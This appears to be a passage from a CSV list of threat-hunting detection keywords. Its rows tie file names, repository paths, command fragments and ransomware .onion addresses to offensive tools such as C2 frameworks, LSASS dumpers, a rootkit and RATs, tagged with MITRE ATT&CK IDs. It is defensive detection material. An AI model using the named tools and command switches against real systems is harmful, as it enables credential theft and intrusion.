"*LW8sLS1vcHRpb25z*",".{0,1000}LW8sLS1vcHRpb25z.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","51480"
"*LWIsLS1idWNrZXQ=*",".{0,1000}LWIsLS1idWNrZXQ\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","51481"
"*LWYsLS1maWxl*",".{0,1000}LWYsLS1maWxl.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","51482"
"*LXAsLS1waWQ=*",".{0,1000}LXAsLS1waWQ\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","51483"
"*LXAsLS1wYXlsb2Fk*",".{0,1000}LXAsLS1wYXlsb2Fk.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","51484"
"*LXUsLS11cmk=*",".{0,1000}LXUsLS11cmk\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","51485"
"*ly4k/Certipy*",".{0,1000}ly4k\/Certipy.{0,1000}","offensive_tool_keyword","ADCSKiller","ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure","T1552.004 - T1003.003 - T1114.002 - T1649","TA0006 - TA0003 - TA0005","N/A","N/A","Exploitation tool","https://github.com/grimlockx/ADCSKiller","1","1","N/A","N/A","N/A","8","710","70","2023-05-19T17:36:37Z","2023-05-19T06:51:41Z","51486"
"*ly4k/Certipy*",".{0,1000}ly4k\/Certipy.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","1","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","51487"
"*ly4k/PassTheChallenge*",".{0,1000}ly4k\/PassTheChallenge.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","1","N/A","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","51488"
"*ly4k/SpoolFool*",".{0,1000}ly4k\/SpoolFool.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","1","N/A","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","51489"
"*lyncsmash*",".{0,1000}lyncsmash.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations","T1580 - T1201 - T1071 - T1110 - T1078","TA0043 - TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","8","4","337","63","2024-10-01T11:22:01Z","2016-05-20T04:32:41Z","51490"
"*lyncsmash.git*",".{0,1000}lyncsmash\.git.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","8","4","337","63","2024-10-01T11:22:01Z","2016-05-20T04:32:41Z","51491"
"*lyncsmash.log*",".{0,1000}lyncsmash\.log.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","#logfile","N/A","8","4","337","63","2024-10-01T11:22:01Z","2016-05-20T04:32:41Z","51492"
"*lyncsmash.py*",".{0,1000}lyncsmash\.py.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","8","4","337","63","2024-10-01T11:22:01Z","2016-05-20T04:32:41Z","51493"
"*lyncsmash-master*",".{0,1000}lyncsmash\-master.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","8","4","337","63","2024-10-01T11:22:01Z","2016-05-20T04:32:41Z","51494"
"*LyncSniper*",".{0,1000}LyncSniper.{0,1000}","offensive_tool_keyword","LyncSniper","LyncSniper is a tool for penetration testing Lync and Skype for Business deployments hosted either on premise or in Office 365","T1566 - T1574 - T1210 - T1596","TA0002 - TA0011 - TA0009","N/A","N/A","Exploitation tool","https://github.com/mdsecactivebreach/LyncSniper","1","0","N/A","N/A","7","1","9","3","2017-04-11T08:38:28Z","2017-06-12T10:56:58Z","51495"
"*lynxmk/blackvision*",".{0,1000}lynxmk\/blackvision.{0,1000}","offensive_tool_keyword","blackvision","Command line Remote Access tool (RAT) for Windows.","T1090 - T1095 - T1008","TA0011","N/A","N/A","Malware","https://github.com/quantumcore/blackvision","1","1","N/A","N/A","10","1","14","10","2019-09-16T18:32:51Z","2019-07-04T17:32:35Z","51496"
"*lypd0/DeadPotato*",".{0,1000}lypd0\/DeadPotato.{0,1000}","offensive_tool_keyword","DeadPotato","DeadPotato is a windows privilege escalation utility from the Potato family of exploits leveraging the SeImpersonate right to obtain SYSTEM privileges","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/lypd0/DeadPotato","1","1","N/A","N/A","10","4","382","45","2024-08-17T06:08:29Z","2024-07-31T01:08:30Z","51497"
"*-m * -d * -w * --top-web-ports*",".{0,1000}\-m\s.{0,1000}\s\-d\s.{0,1000}\s\-w\s.{0,1000}\s\-\-top\-web\-ports.{0,1000}","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Reconnaissance","https://github.com/v4d1/Dome","1","0","N/A","N/A","5","6","531","74","2024-02-07T09:12:17Z","2022-02-20T15:09:40Z","51498"
"*-m dumpert *",".{0,1000}\-m\sdumpert\s.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","51499"
"*-M handlekatz -o *",".{0,1000}\-M\shandlekatz\s\-o\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","51500"
"*'M', 'E', 'L', 'T', 'E', 'D', 0*",".{0,1000}\'M\',\s\'E\',\s\'L\',\s\'T\',\s\'E\',\s\'D\',\s0.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","51501"
"*'M', 'i', 'n', 'i', 'D', 'u', 'm', 'p', 'W', 'r', 'i', 't', 'e', 'D', 'u', 'm', 'p'*",".{0,1000}\'M\',\s\'i\',\s\'n\',\s\'i\',\s\'D\',\s\'u\',\s\'m\',\s\'p\',\s\'W\',\s\'r\',\s\'i\',\s\'t\',\s\'e\',\s\'D\',\s\'u\',\s\'m\',\s\'p\'.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","N/A","10","5","401","70","2024-07-08T15:58:37Z","2024-04-09T16:33:27Z","51502"
"*'M','i','n','i','D','u','m','p','W','r','i','t','e','D','u','m','p'*",".{0,1000}\'M\',\'i\',\'n\',\'i\',\'D\',\'u\',\'m\',\'p\',\'W\',\'r\',\'i\',\'t\',\'e\',\'D\',\'u\',\'m\',\'p\'.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","N/A","10","1","31","79","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z","51503"
"*M.i.m.i.k.a.t.z*",".{0,1000}M\.i\.m\.i\.k\.a\.t\.z.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001  -  T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","51504"
"*M.i.m.i.k.a.t.z*",".{0,1000}M\.i\.m\.i\.k\.a\.t\.z.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","51505"
"*m00zh33/golang_c2*",".{0,1000}m00zh33\/golang_c2.{0,1000}","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021  -  T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","1","N/A","N/A","10","10","6","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z","51506"
"*m0nad/Diamorphine*",".{0,1000}m0nad\/Diamorphine.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","1","#linux","N/A","10","10","1986","451","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z","51507"
"*m0rv4i/SharpCookieMonster*",".{0,1000}m0rv4i\/SharpCookieMonster.{0,1000}","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tool","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","N/A","3","202","44","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z","51508"
"*m232fdxbfmbrcehbrj5iayknxnggf6niqfj6x4iedrgtab4qupzjlaid.onion*",".{0,1000}m232fdxbfmbrcehbrj5iayknxnggf6niqfj6x4iedrgtab4qupzjlaid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51509"
"*m3f157O/combine_harvester*",".{0,1000}m3f157O\/combine_harvester.{0,1000}","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","1","N/A","N/A","10","2","108","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z","51511"
"*m4ll0k/SecretFinder*",".{0,1000}m4ll0k\/SecretFinder.{0,1000}","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","N/A","10","2153","405","2024-05-26T09:36:41Z","2020-06-08T10:50:12Z","51512"
"*m6s6axasulxjkhzh.onion*",".{0,1000}m6s6axasulxjkhzh\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51513"
"*m8sec/nullinux*",".{0,1000}m8sec\/nullinux.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","1","#linux","N/A","7","6","575","101","2024-06-19T14:29:09Z","2016-04-28T16:45:02Z","51514"
"*MAAD_Attack.ps1*",".{0,1000}MAAD_Attack\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","51515"
"*MAAD_Config.ps1*",".{0,1000}MAAD_Config\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","51516"
"*MAAD_Mitre_Map.ps1*",".{0,1000}MAAD_Mitre_Map\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","51517"
"*MAADInitialization.ps1*",".{0,1000}MAADInitialization\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","51518"
"*mac.changer on*",".{0,1000}mac\.changer\son.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 -  BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","0","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","51519"
"*mac_dirty_cow.*",".{0,1000}mac_dirty_cow\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","51520"
"*mac2john.py*",".{0,1000}mac2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","51521"
"*mac2john-alt.py*",".{0,1000}mac2john\-alt\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","51522"
"*MaccaroniC2.git*",".{0,1000}MaccaroniC2\.git.{0,1000}","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","N/A","10","10","76","16","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z","51523"
"*macchanger -r*",".{0,1000}macchanger\s\-r.{0,1000}","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","0","N/A","N/A","8","1","67","21","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z","51525"
"*MaceTrap.exe*",".{0,1000}MaceTrap\.exe.{0,1000}","offensive_tool_keyword","macetrap","MaceTrap is a proof-of-concept for time stomping using SetFileTime. MaceTrap allows you to set the CreationTime / LastAccessTime / LastWriteTime for arbitrary files and folders","T1070.004","TA0040","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/MaceTrap","1","1","N/A","N/A","N/A","10","1131","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z","51527"
"*machine1337/TelegramRAT*",".{0,1000}machine1337\/TelegramRAT.{0,1000}","offensive_tool_keyword","TelegramRAT","Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions","T1071.001 - T1105 - T1027","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/machine1337/TelegramRAT","1","1","N/A","N/A","10","10","372","62","2024-01-23T12:05:59Z","2023-06-30T10:59:55Z","51528"
"*Macro payload cannot be smuggled*",".{0,1000}Macro\spayload\scannot\sbe\ssmuggled.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","51530"
"*macro_pack.exe -G *",".{0,1000}macro_pack\.exe\s\-G\s.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","51531"
"*MacroDetectSandbox.vbs*",".{0,1000}MacroDetectSandbox\.vbs.{0,1000}","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","N/A","10","10","2689","527","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z","51532"
